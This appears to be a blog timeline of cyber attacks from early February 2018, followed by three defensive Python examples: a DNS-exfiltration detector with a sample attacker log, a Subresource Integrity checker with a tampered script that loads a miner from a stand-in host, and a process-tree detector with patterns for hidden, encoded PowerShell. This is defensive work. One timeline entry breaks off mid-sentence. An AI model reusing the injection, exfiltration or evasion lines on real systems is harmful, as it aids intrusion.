1-15 February 2018 Cyber Attacks Timeline

It's time to publish the first timeline of February 2018, covering the main cyber attacks that occurred in the first half of the second month of this troubled year. Yes, because 2018 has just begun and the growing trend of massive attacks seems unstoppable.

And part of this is due, unsurprisingly, to the new gold rush of cryptocurrencies: if you scroll down the list you will find 16 events whose direct or indirect purpose is to steal or mine cryptocurrency. You will also notice a wide range of attack vectors: vulnerabilities in messaging clients (a Telegram zero-day) and automation servers (Jenkins), high-profile domains injected with in-browser miners, another cryptocurrency exchange hacked (BitGrail) with a possible loss of $170 million, and operations carried out by (un)common criminals or by state-sponsored groups (like the North Korean Lazarus Group, AKA Hidden Cobra).

But February 2018 was also the month of the Winter Olympic Games, and the cyber attack that everyone expected against the opening ceremony duly happened (possibly as part of a wider operation).

Last but not least, February brought yet another mega breach, this time affecting Swisscom and potentially compromising 800,000 individuals, nearly one tenth of the entire Swiss population.

As usual, if you want to have an idea of how fragile our electronic identity is in cyberspace, have a look at the timelines of the main cyber attacks in 2011, 2012, 2013, 2014, 2015, 2016 and 2017 (regularly updated). You may also want to have a look at the Cyber Attack Statistics that are regularly published, and follow @paulsparrows on Twitter for the latest updates.

Additionally, feel free to submit remarkable incidents that in your opinion deserve to be included in the timelines (and charts). If useful, you can access the timeline in Google Sheets format.

Legend: in the Author column "?" means the attacker is unknown. Attack Class is CC = Cyber Crime, CE = Cyber Espionage, H = Hacktivism, CW = Cyber Warfare. Target Class uses the industry section letters (matching the ISIC Rev.4 sections) plus the extensions V Fintech, X Individual, Y Multiple Industries and Z Unknown. Country ">1" means the event affected more than one country.

ID | Date | Author | Target | Description | Attack | Target Class | Attack Class | Country
---|---|---|---|---|---|---|---|---
1 | 01/02/2018 | ? | Single Individuals | The FBI warns that hackers have been impersonating a federal online crime complaint portal to trick victims into divulging personal and sensitive information in a new phishing scam. | Account Hijacking | X Individual | CC | >1
2 | 01/02/2018 | Iron Tiger | Institutions in the government, technology, education and telecommunications sectors in Asia and the US | Security researchers from Bitdefender discover a custom-built piece of malware that has been wreaking havoc in Asia for several months and could signal the return of the notorious Chinese hacker group Iron Tiger. The campaign, called Operation PZChao, has been targeting institutions in the government, technology, education and telecommunications sectors in Asia and the US. | Targeted Attack | Y Multiple Industries | CE | >1
3 | 01/02/2018 | ? | Google Chrome Users | Security researchers from Trend Micro uncover 89 malicious Google Chrome extensions on the official Chrome Web Store that can inject ads, secretly mine cryptocurrency, and load a tool that records and replays a person's browsing activity. According to the researchers, this collection of extensions affected over 423,000 users and was used to form a new botnet called "Droidclub". | Malware | X Individual | CC | >1
4 | 01/02/2018 | ? | IoT Devices | Researchers from the cyber-security firm Radware discover a new IoT DDoS botnet, built by San Calvicie, an operator of a gaming server rental business. The botnet, called JenX, borrows parts of other IoT botnets, for instance the exploits for CVE-2014-8361 and CVE-2017-17215. | Vulnerability | X Individual | CC | >1
5 | 01/02/2018 | ? | City of Pittsburg in Kansas | The City of Pittsburg in Kansas reveals that it has been subjected to a sophisticated phishing scheme targeting employee payroll data. The attack results in the release of sensitive information for current and former city employees who received a W-2 for the 2017 fiscal year. | Account Hijacking | O Public administration and defence, compulsory social security | CC | US
6 | 01/02/2018 | ? | HORNE LLP | HORNE LLP notifies an incident affecting the security of protected health information of certain Forrest General Hospital patients. On November 1, 2017, the company discovered that the email account of one of its employees was sending phishing emails. | Account Hijacking | K Financial and insurance activities | CC | US
7 | 01/02/2018 | ? | City of Batavia | The City of Batavia reports that employees' personal and financial information was compromised through an email phishing attack targeting W-2 tax forms. The information includes names, Social Security numbers, addresses and earnings. | Account Hijacking | O Public administration and defence, compulsory social security | CC | US
8 | 01/02/2018 | ? | Kinetics Systems | Kinetics Systems falls victim to a phishing attack. The personal information of 11 residents of New Hampshire, including their W-2 forms, is compromised. | Account Hijacking | C Manufacturing | CC | US
9 | 01/02/2018 | ? | Purchase Line School District | The Purchase Line School District is the victim of an email spoofing attack by an individual pretending to be a school district employee. | Account Hijacking | P Education | CC | US
10 | 01/02/2018 | ? | Coastal Cape Fear Eye Associates | Coastal Cape Fear Eye Associates notifies HHS of a ransomware incident that impacted 925 patients. | Malware | Q Human health and social work activities | CC | US
11 | 01/02/2018 | ? | Aperio | Aperio informs of a data breach that occurred when two employees' email accounts were compromised by successful phishing attacks, which resulted in email from those accounts being auto-forwarded to two external accounts. | Account Hijacking | K Financial and insurance activities | CC | US
12 | 02/02/2018 | ? | Redis and OrientDB servers | Researchers from Qihoo 360 discover a new Monero-mining botnet targeting Redis and OrientDB servers, which has infected nearly 4,400 servers and mined over $925,000 worth of Monero since March 2017. The botnet, called DDG, targets Redis servers via a dictionary brute-force attack on credentials, and OrientDB databases by exploiting the CVE-2017-11467 remote code execution vulnerability. | Brute Force / Remote Code Execution Vulnerability | X Individual | CC | >1
13 | 02/02/2018 | ? | Mac Users | Researchers from Malwarebytes reveal that the MacUpdate site has been hacked to distribute the OSX.CreativeUpdate Monero miner via maliciously modified copies of the Firefox, OnyX, and Deeper applications. | Malware | X Individual | CC | >1
14 | 02/02/2018 | ? | Ron's Pharmacy Services | Ron's Pharmacy Services notifies certain patients of unauthorized access to limited pieces of patient information, including patient names, Ron's Pharmacy internal account numbers, and payment adjustment information, after an employee email account was compromised in October 2017. | Account Hijacking | G Wholesale and retail trade | CC | US
15 | 03/02/2018 | ? | Android Users | Researchers from Qihoo 360 discover an additional botnet targeting Android devices: it scans for open debug ports in order to infect victims with malware that mines the Monero cryptocurrency. The botnet targets TCP port 5555, which on Android devices is the port used by the operating system's native Android Debug Bridge (ADB). The malware is dubbed ADB.Miner. | Malware | X Individual | CC | >1
16 | 04/02/2018 | ? | Reddit Users | Security researcher Alec Muffett discovers a clone of the popular social news aggregation and discussion site Reddit on the reddit.co domain. | Account Hijacking | X Individual | CC | >1
17 | 04/02/2018 | ? | City of Keokuk | The City of Keokuk says a data breach resulted in the release of personal information of current and former city employees and elected leaders. An unauthorized party was able to obtain 2017 W-2 tax forms through the use of a "criminal phishing email." | Account Hijacking | O Public administration and defence, compulsory social security | CC | US
18 | 05/02/2018 | ? | Waldo County | A phishing attack compromises the information of 100 Waldo County employees. | Account Hijacking | O Public administration and defence, compulsory social security | CC | US
19 | 05/02/2018 | ? | City of Keokuk | The City of Keokuk discloses that a cybercriminal used a phishing scam to fraudulently obtain an electronic file containing the 2017 W-2 tax forms of current and former employees and elected officials. | Account Hijacking | O Public administration and defence, compulsory social security | CC | US
20 | 05/02/2018 | ? | Partners HealthCare System | Partners HealthCare System reveals that it has discovered a malware attack, which occurred in May 2017, that may have exposed 2,600 patients' information. | Malware | Q Human health and social work activities | CC | US
21 | 05/02/2018 | ? | University of Northern Colorado | The private information of 12 University of Northern Colorado employees is compromised after an "unknown person or group" accessed their profiles on Ursa, UNC's online portal. | Unknown | P Education | CC | US
22 | 06/02/2018 | Hidden Cobra, aka Lazarus Group | Multiple Targets | The Department of Homeland Security (DHS) and the FBI jointly release two new reports analyzing trojan malware attributed to Hidden Cobra, aka Lazarus Group, a threat actor widely believed to be sponsored by the North Korean government. The two malware packages, referred to as HARDRAIN and BADCALL, can install a remote access tool (RAT) payload on Android devices and force infected Windows systems to act as a proxy server. | Targeted Attack | Y Multiple Industries | CE | >1
23 | 06/02/2018 | AnonPlus | Italian Democratic Party (PD) | The AnonPlus hacker group says it has hacked the Florence branch of the Italian centre-left Democratic Party (PD) and leaked data regarding its leader Matteo Renzi online. | Unknown | U Activities of extraterritorial organizations and bodies | H | IT
24 | 06/02/2018 | AnonPlus | Province of Milan | The same hackers also claim to have hacked the website of the Provincia di Milano (Province of Milan) in Italy. | SQLi | O Public administration and defence, compulsory social security | H | IT
25 | 07/02/2018 | ? | Swisscom | Swisscom, the biggest telecom company in Switzerland, suffers a data breach that resulted in the compromise of the personal data of some 800,000 customers, i.e., nearly ten percent of the entire Swiss population. The breach dates back to autumn 2017, and the data accessed includes the first and last names, home addresses, dates of birth and telephone numbers of Swisscom customers. | Account Hijacking | J Information and communication | CC | CH
26 | 07/02/2018 | ? | The Sacramento Bee | The Sacramento Bee deletes two databases hosted by a third party after a ransomware attack exposed the voter records of 19.5 million California voters and the records of 53,000 current and former subscribers to the newspaper. | Malware | J Information and communication | CC | US
27 | 07/02/2018 | ? | Nova Poshta | The personal data of 500,000 clients of Nova Poshta, the largest private delivery company in Ukraine, is allegedly leaked on the dark web. | Unknown | S Other service activities | CC | UA
28 | 07/02/2018 | ? | City of Enumclaw | The City of Enumclaw accidentally sends an email to an "individual pretending to be a member of City administration" and compromises the W-2s of hundreds of employees. | Account Hijacking | O Public administration and defence, compulsory social security | CC | US
29 | 07/02/2018 | ? | Twitter Users | Online scammers make over $5,000 worth of Ethereum in one night alone by creating fake Twitter profiles for real-world celebrities and spamming the social network with messages tricking users into participating in "giveaways." | Fake Twitter Accounts | X Individual | CC | >1
30 | 07/02/2018 | ? | Targets in the Middle East | Researchers from Cisco Talos reveal the details of a campaign targeting entities with an interest in the geopolitical context of the region. | Targeted Attack | Y Multiple Industries | CE | >1
31 | 07/02/2018 | ? | Business Wire | The press release network Business Wire admits suffering an ongoing Distributed Denial of Service (DDoS) attack that has lasted a week. | DDoS | J Information and communication | CC | US
32 | 07/02/2018 | ? | Smith Dental | Smith Dental notifies of a ransomware attack affecting 1,500 patients. | Malware | Q Human health and social work activities | CC | US
33 | 08/02/2018 | ? | Undisclosed Water Utility Company | Researchers from Radiflow discover the first known example of malware attacking the operational network of a water utility company in order to mine the Monero cryptocurrency. | Malware | E Water supply, sewerage, waste management and remediation activities | CC | N/A
34 | 08/02/2018 | ? | Decatur County General Hospital | Decatur County General Hospital in Parsons, Tennessee, publicly discloses that an unauthorized party accessed the server for its electronic medical record system and secretly implanted cryptomining malware. | Malware | Q Human health and social work activities | CC | US
35 | 08/02/2018 | ? | Single Individuals | Researchers from Trend Micro reveal the details of a malicious spam campaign aimed at distributing the Loki malware. | Malware | X Individual | CC | >1
36 | 08/02/2018 | ? | Mikaela Hoover | The Fappening scandal continues in 2018, and Guardians of the Galaxy actress Mikaela Hoover appears to be the most recent victim. | Account Hijacking | X Individual | CC | US
37 | 08/02/2018 | ? | Multiple Targets | Researchers from Forcepoint discover a new strain of point-of-sale (PoS) malware that disguises itself as a LogMeIn service pack and exfiltrates stolen payment card information through DNS queries to an attacker-controlled DNS server. | PoS Malware | Y Multiple Industries | CC | >1
38 | 08/02/2018 | ? | Cisco ASA Users | Five days after details of a vulnerability in Cisco ASA software (CVE-2018-0101) became public, Cisco reveals that it is "aware of attempted malicious use of the vulnerability." | Cisco ASA Vulnerability | Y Multiple Industries | CC | >1
39 | 08/02/2018 | ? | Single Individuals | A new malspam campaign is underway, installing the GandCrab ransomware on victims' computers. This is done through a series of malicious documents that ultimately install the ransomware via a PowerShell script. | Malware | X Individual | CC | >1
40 | 09/02/2018 | ? | Single Individuals | A new ransomware called Black Ruby is discovered. The ransomware encrypts the files on a computer, scrambles the file names, and then appends the BlackRuby extension. To make matters worse, Black Ruby also installs a Monero miner. The malware does not encrypt computers located in Iran. | Malware | X Individual | CC | >1
41 | 10/02/2018 | Vietnamese Hacker | Newtek Business Services Corp. | Newtek Business Services Corp., a web services conglomerate that operates more than 100,000 business websites and some 40,000 managed technology accounts, has several of its core domain names stolen over the weekend. | DNS Hijacking | J Information and communication | CC | US
42 | 10/02/2018 | ? | BitGrail | The Italian cryptocurrency exchange BitGrail reports a loss of 17 million Nano, valued at over $170 million at the time of the hack. However, conflicting reports surface, with some believing the exchange to have been insolvent for a number of months. | Unknown | V Fintech | CC | IT
43 | 11/02/2018 | ? | Pyeongchang Winter Olympics | Pyeongchang Winter Olympics organizers confirm that the Games fell victim to a cyber attack during Friday's opening ceremony, but refuse to reveal the source. Researchers from Cisco Talos call the malware Olympic Destroyer and confirm that its only purpose is to disrupt systems. | Targeted Attack | U Activities of extraterritorial organizations and bodies | CW | KR
44 | 11/02/2018 | ? | 4,275 sites | 4,275 sites are injected with an in-browser Monero miner after a popular accessibility script, BrowseAloud by TextHelp.com, is compromised. The list of affected sites includes government websites such as uscourts.gov, ico.org.uk and manchester.gov.uk. | Malicious Script | Y Multiple Industries | CC | >1
45 | 12/02/2018 | ? | WordPress Websites | Two malicious plug-ins are discovered by Sucuri injecting obfuscated JavaScript into WordPress websites in order to generate advertisements that appear if a visitor clicks anywhere on the page. | WordPress Malicious Plugins | X Individual | CC | >1
46 | 12/02/2018 | ? | Android Users | Malwarebytes researchers detect a series of attacks that began around November 2017 in which millions of Android devices were redirected to a specifically designed page performing in-browser mining of the Monero cryptocurrency. | Drive-By | X Individual | CC | >1
47 | 12/02/2018 | Hidden Cobra, aka Lazarus Group | Bitcoin users and global financial organizations | Researchers from McAfee discover an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact. The campaign is dubbed HaoBao and targets Bitcoin users and global financial organizations. | Targeted Attack | K Financial and insurance activities | CC | >1
48 | 12/02/2018 | ? | Single Individuals | A new variant of the Rapid Ransomware is being distributed via malspam that pretends to come from the Internal Revenue Service. | Malware | X Individual | CC | >1
49 | 12/02/2018 | ? | Single Individuals | Researchers from IBM X-Force reveal the details of a new campaign leveraging the Necurs botnet to send Valentine's Day-themed spam emails. The campaign reaches over 230 million spam messages within two weeks. | Malware | X Individual | CC | >1
50 | 12/02/2018 | ? | Idaho Transportation Department (ITD) | A hack of two email accounts at the Idaho Transportation Department (ITD) potentially exposes the personal information of commercial truckers whose rigs are registered in Idaho, including Social Security and credit card numbers. About 114 individuals are notified. | Account Hijacking | O Public administration and defence, compulsory social security | CC | US
51 | 12/02/2018 | ? | Entergy | Entergy notifies employees of a W-2 breach involving the TALX portal (TALX is a wholly-owned subsidiary of Equifax). The breach involves 2016 W-2 data. | Unknown | D Electricity, gas, steam and air conditioning supply | CC | US
52 | 13/02/2018 | ? | Telegram Users | Researchers from Kaspersky reveal that malware authors have used a zero-day vulnerability in the Windows client of the Telegram instant messaging service to infect users with cryptocurrency-mining malware (primarily for Monero, Zcash and Fantomcoin). | Zero-Day Vulnerability in Telegram | X Individual | CC | >1
53 | 13/02/2018 | ? | Android Users | Researchers from Trend Micro detect a new variant of the Android Remote Access Tool (AndroRAT), identified as ANDROIDOS_ANDRORAT.HRXC, that has the ability to inject root exploits. The AndroRAT targets CVE-2015-1805, a vulnerability publicly disclosed in 2016. | Malware | X Individual | CC | >1
54 | 13/02/2018 | ? | Military personnel and businessmen, among others, in various South Asian countries | With Valentine's Day approaching, researchers from Trend Micro reveal that criminals from the Confucius gang are targeting military personnel and businessmen, among others, in various South Asian countries, persuading them to download malware hidden in chat apps. | Targeted Attack | X Individual | CE | >1
55 | 13/02/2018 | ? | Vulnerable Firewalls | Researchers from NewSky Security discover a new IoT botnet, dubbed DoubleDoor, that exploits CVE-2015-7755 and CVE-2016-10401 to bypass Juniper and Zyxel firewalls respectively. | Malware | Y Multiple Industries | CC | >1
56 | 13/02/2018 | ? | Advertisement Screen in London | The latest victim of the cryptocurrency frenzy is an advertisement screen in London that is infected by a miner. | Malware | Z Unknown | CC | UK
57 | 14/02/2018 | ? | Staybridge Suites Lexington Hotel | The Staybridge Suites Lexington Hotel is hit by what appears to be a point-of-sale data breach, which occurred when several devices at the hotel were infected with malware. | PoS Malware | R Arts, entertainment and recreation | CC | US
58 | 14/02/2018 | ? | Single Individuals | Researchers from Trustwave reveal a new multi-stage email attack using Word documents that exploit CVE-2017-11882 without making use of any macro. | Malware | X Individual | CC | >1
59 | 14/02/2018 | ? | Single Individuals | A Ukrainian cybercrime operation has made an estimated $50 million by using Google AdWords to lure users to Bitcoin phishing sites. The operation is temporarily disrupted by the Ukrainian cyber police, acting on information received from Cisco's Talos security division. The campaign is dubbed Coinhoarder. | SEO Poisoning | X Individual | CC | >1
60 | 14/02/2018 | ? | Bitmessage users | The maintainers of the Bitmessage P2P encrypted communications protocol release a fix after discovering that hackers were using a zero-day vulnerability in attempts to steal Bitcoin wallet files from users' computers. | Zero-Day Vulnerability in Bitmessage | X Individual | CC | >1
61 | 14/02/2018 | ? | Atos | Reports emerge that the Olympic Destroyer malware may have been used months earlier to target Atos, the IT provider of the Winter Olympics. | Targeted Attack | J Information and communication | CE | FR
62 | 14/02/2018 | ? | Western Union | Western Union warns that some customers' information may have been accessed without authorization as a result of a computer intrusion against an external vendor system formerly used by Western Union for secure data storage. | Unknown | K Financial and insurance activities | CC | US
63 | 15/02/2018 | ? | Jenkins CI Servers | Researchers from Check Point reveal the details of Jenkins Miner, a massive operation targeting Jenkins CI servers via CVE-2017-1000353 and aimed at mining the Monero cryptocurrency. The criminals are able | Malware | Y Multiple Industries | CC | >1
64 | 15/02/2018 | ? | Retina-X Studios | A vigilante hacker claims to have wiped 1 terabyte of data from Retina-X Studios, a company that sells spyware products. | Unknown | J Information and communication | CC | US
65 | 15/02/2018 | GOLD LOWELL | Multiple Targets | Researchers from SecureWorks reveal the details of a threat actor dubbed GOLD LOWELL using the SamSam ransomware for opportunistic attacks. | Malware | Y Multiple Industries | CC | US
66 | 15/02/2018 | ? | Single Individuals | Researchers from IBM X-Force discover a new variant of the infamous TrickBot malware repurposed to steal bitcoins. | Malware | X Individual | CC | >1
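
Entry 37 (Forcepoint's PoS malware) is a reminder that DNS is a favourite exfiltration channel precisely because outbound port 53 is almost never blocked. The Python snippet below is an added example, not code from this timeline or from Forcepoint: it runs over a constructed resolver log (the line format, the client addresses, and the update-logmein.example zone are all assumptions) and reports zones that receive many distinct, long, hex- or base32-looking leftmost labels, which is what data smuggled out one query at a time looks like.

```python
"""Flag DNS-based exfiltration in resolver query logs (added example for entry 37)."""
import math
import re
from collections import Counter, defaultdict

# Constructed sample log, not taken from the Forcepoint report. Assumed line format:
# "<timestamp> <client-ip> <qname> <qtype>". Host 10.0.5.21 plays the infected PoS
# terminal, leaking hex-encoded records one label at a time; the other hosts are benign.
SAMPLE_DNS_LOG = """\
2018-02-08T10:01:02Z 10.0.5.21 www.logmein.com A
2018-02-08T10:01:03Z 10.0.5.21 4c4f474d45494e2d30303031.update-logmein.example A
2018-02-08T10:01:04Z 10.0.5.21 34363136313130303030303030303030.update-logmein.example A
2018-02-08T10:01:05Z 10.0.5.21 35343234313830303030303030303030.update-logmein.example A
2018-02-08T10:01:06Z 10.0.5.21 34333435363137363130303030303030.update-logmein.example A
2018-02-08T10:01:07Z 10.0.5.22 mail.example.com MX
2018-02-08T10:01:08Z 10.0.5.22 d3k2m5n7p2q4r6s8t0v1.cdn.example A
2018-02-08T10:01:09Z 10.0.5.23 a-very-long-but-legitimate-hostname.example.org A
"""

HEX_LABEL = re.compile(r"^[0-9a-f]+$")
BASE32_LABEL = re.compile(r"^[a-z2-7]+$")


def shannon_entropy(s):
    """Bits per character of s. Reported for context only, never used as a threshold:
    hex-encoded digit strings (what card data looks like once encoded) score low."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def parse_line(line):
    ts, client, qname, qtype = line.split()
    return {"ts": ts, "client": client, "qname": qname.lower().rstrip("."), "qtype": qtype}


def split_qname(qname):
    """Return (leftmost label, zone). The zone is approximated as the last two labels;
    a public-suffix list would be more accurate in production."""
    labels = qname.split(".")
    if len(labels) <= 2:
        return "", qname
    return labels[0], ".".join(labels[-2:])


def encoded_payload_bytes(label):
    """Bytes the label carries if it looks hex- or base32-encoded, else 0."""
    if HEX_LABEL.match(label):
        return len(label) // 2
    if BASE32_LABEL.match(label):
        return len(label) * 5 // 8
    return 0


def find_dns_exfil(log_text, min_label_len=20, min_unique=3):
    """Group long, encoded-looking leftmost labels by zone; a zone that receives
    min_unique or more distinct such labels is reported as a likely exfil channel."""
    per_zone = defaultdict(lambda: {"labels": set(), "clients": set(), "bytes": 0})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        label, zone = split_qname(rec["qname"])
        if len(label) < min_label_len:
            continue
        payload = encoded_payload_bytes(label)
        if payload == 0:  # hyphens or a mixed charset: an ordinary long hostname
            continue
        z = per_zone[zone]
        if label not in z["labels"]:  # a repeated lookup carries no new data
            z["labels"].add(label)
            z["bytes"] += payload
        z["clients"].add(rec["client"])
    findings = {}
    for zone, z in per_zone.items():
        if len(z["labels"]) >= min_unique:
            findings[zone] = {
                "unique_queries": len(z["labels"]),
                "payload_bytes": z["bytes"],
                "clients": sorted(z["clients"]),
                "mean_entropy": round(
                    sum(shannon_entropy(l) for l in z["labels"]) / len(z["labels"]), 2),
            }
    return findings


if __name__ == "__main__":
    for zone, info in find_dns_exfil(SAMPLE_DNS_LOG).items():
        print(zone, info)
```

Entropy is deliberately reported but not thresholded: a hex-encoded run of digits scores lower than a random-looking CDN hostname, so a naive "high-entropy label" rule would miss exactly this case. The robust signal is the number of distinct long encoded labels landing in one zone, combined with the total bytes they carry.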

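Entry 44 (BrowseAloud) is the classic third-party-script supply-chain failure: thousands of sites executed whatever TextHelp's server happened to serve. Subresource Integrity (SRI) lets a page pin the exact script it reviewed, so a tampered copy is refused by the browser. The following is an added example, not TextHelp's code nor anything from the affected sites; the two script bodies, the miner URL and the CDN URL are constructed stand-ins.

```python
"""Pin a third-party script with Subresource Integrity (added example for entry 44)."""
import base64
import hashlib

SRI_ALGOS = ("sha256", "sha384", "sha512")

# Constructed stand-ins; neither is the real BrowseAloud code nor the real injected miner.
ORIGINAL_SCRIPT = b"(function(){window.BrowseAloud={version:'2.5.0'};})();\n"
TAMPERED_SCRIPT = ORIGINAL_SCRIPT + (
    b"var s=document.createElement('script');"
    b"s.src='https://miner.example/lib.js';document.head.appendChild(s);\n"
)


def sri_digest(body, algo="sha384"):
    """Return the integrity metadata for body, e.g. 'sha384-<base64 digest>'."""
    if algo not in SRI_ALGOS:
        raise ValueError("SRI permits only sha256, sha384 and sha512")
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src, body, algo="sha384"):
    """The <script> element a site embeds once it has reviewed and pinned the script.
    crossorigin="anonymous" is required for SRI to apply to a cross-origin resource."""
    return (f'<script src="{src}" integrity="{sri_digest(body, algo)}" '
            f'crossorigin="anonymous"></script>')


def sri_verify(body, integrity):
    """Replicate the browser-side check against a fetched body.
    The attribute may list several space-separated values; only the strongest hash
    function present counts, and any of its digests matching is a pass. One deliberate
    difference from browsers: a browser loads a resource whose metadata is unparseable,
    whereas this gate refuses it, so a typo cannot silently disable pinning."""
    candidates = {}
    for token in integrity.split():
        algo, _, b64 = token.partition("-")
        if algo in SRI_ALGOS and b64:
            candidates.setdefault(algo, set()).add(b64)
    if not candidates:
        return False
    strongest = max(candidates, key=lambda a: int(a[3:]))
    actual = base64.b64encode(hashlib.new(strongest, body).digest()).decode("ascii")
    return actual in candidates[strongest]


if __name__ == "__main__":
    # The CDN URL is assumed for illustration only.
    pinned = sri_digest(ORIGINAL_SCRIPT)
    print(script_tag("https://cdn.example/browsealoud/ba.js", ORIGINAL_SCRIPT))
    print("original loads:", sri_verify(ORIGINAL_SCRIPT, pinned))
    print("tampered loads:", sri_verify(TAMPERED_SCRIPT, pinned))
```

SRI only protects resources your own markup references directly: anything the pinned script itself fetches at runtime is outside its reach, so pair it with a Content-Security-Policy script-src allowlist. The price is operational, since every legitimate update by the vendor changes the digest and the tag must be re-pinned, which is exactly the review step the BrowseAloud victims were missing.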
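Entries 39 (GandCrab dropped by malicious documents via PowerShell) and 58 (CVE-2017-11882 without any macro) share one telemetry signature: a script interpreter whose ancestry leads back to an Office process or to the Equation Editor. This added example (not from Trustwave, Trend Micro or this timeline) rebuilds process trees from constructed Sysmon-style process-creation records and flags those chains; the records, GUIDs, paths and command lines are all made up.

```python
"""Find script interpreters descended from Office or Equation Editor
(added example for entries 39 and 58)."""
import re

# Document hosts that should never spawn an interpreter. EQNEDT32.EXE is listed because
# CVE-2017-11882 executes its payload from there, and it is started via DCOM, so its
# parent is svchost.exe rather than WINWORD.EXE: a rule that only looks at WINWORD's
# direct children misses it entirely.
OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "eqnedt32.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe", "bitsadmin.exe"}

# Command-line traits reported alongside the ancestry (output keeps this order).
FLAG_PATTERNS = [
    ("encoded_command", re.compile(r"(?i)(^|\s)-e(c|nc|ncodedcommand)?(\s|$)")),
    ("hidden_window", re.compile(r"(?i)-w(indowstyle)?\s+hidden")),
    ("execution_policy_bypass", re.compile(r"(?i)-(ep|ex|executionpolicy)\s+bypass")),
]

# Constructed Sysmon-style Event ID 1 records, not real telemetry. p0 (explorer.exe) and
# p9 (svchost.exe) are deliberately absent, as an EDR export cut to a time window often is.
SAMPLE_EVENTS = [
    {"ProcessGuid": "p1", "ParentProcessGuid": "p0",
     "Image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\alice\Downloads\invoice.docx"'},
    {"ProcessGuid": "p2", "ParentProcessGuid": "p9",  # parent is svchost.exe (DCOMLaunch)
     "Image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "CommandLine": r'"EQNEDT32.EXE" -Embedding'},
    {"ProcessGuid": "p3", "ParentProcessGuid": "p2",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c powershell -nop -w hidden -enc SQBFAFgA"},
    {"ProcessGuid": "p4", "ParentProcessGuid": "p3",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -enc SQBFAFgA"},
    {"ProcessGuid": "p5", "ParentProcessGuid": "p1",  # the macro-style direct child
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Users\alice\AppData\Local\Temp\run.ps1"},
    {"ProcessGuid": "p6", "ParentProcessGuid": "p0",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "CommandLine": "chrome.exe"},
    {"ProcessGuid": "p7", "ParentProcessGuid": "p0",  # an admin's shell: benign
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe"},
]


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def ancestry(guid, by_guid, max_depth=8):
    """Walk ParentProcessGuid links and return image names root-first. The walk stops
    where the feed has no record for an ancestor, on a cycle, or at max_depth."""
    chain, seen = [], set()
    cur = by_guid.get(guid)
    while cur is not None and len(chain) < max_depth and cur["ProcessGuid"] not in seen:
        seen.add(cur["ProcessGuid"])
        chain.append(basename(cur["Image"]))
        cur = by_guid.get(cur.get("ParentProcessGuid"))
    return list(reversed(chain))


def command_line_flags(cmdline):
    return [name for name, rx in FLAG_PATTERNS if rx.search(cmdline)]


def detect_document_payload_chains(events):
    """Report every interpreter whose ancestry contains a document host, with the
    chain trimmed to start at that host and the interesting command-line traits."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    findings = []
    for e in events:
        if basename(e["Image"]) not in INTERPRETERS:
            continue
        chain = ancestry(e["ProcessGuid"], by_guid)
        host_idx = next((i for i, img in enumerate(chain) if img in OFFICE_HOSTS), None)
        if host_idx is None:
            continue
        findings.append({"guid": e["ProcessGuid"], "chain": chain[host_idx:],
                         "flags": command_line_flags(e.get("CommandLine", ""))})
    return findings


if __name__ == "__main__":
    for f in detect_document_payload_chains(SAMPLE_EVENTS):
        print(f["guid"], " -> ".join(f["chain"]), f["flags"])
```

Walking the whole ancestry rather than checking only the immediate parent is what catches the EQNEDT32 → cmd → powershell hop in entry 58, and the same walk also surfaces the plain WINWORD → powershell case behind entry 39. Feed it the GUID fields rather than PIDs: PIDs are reused within minutes on a busy host, GUIDs are not.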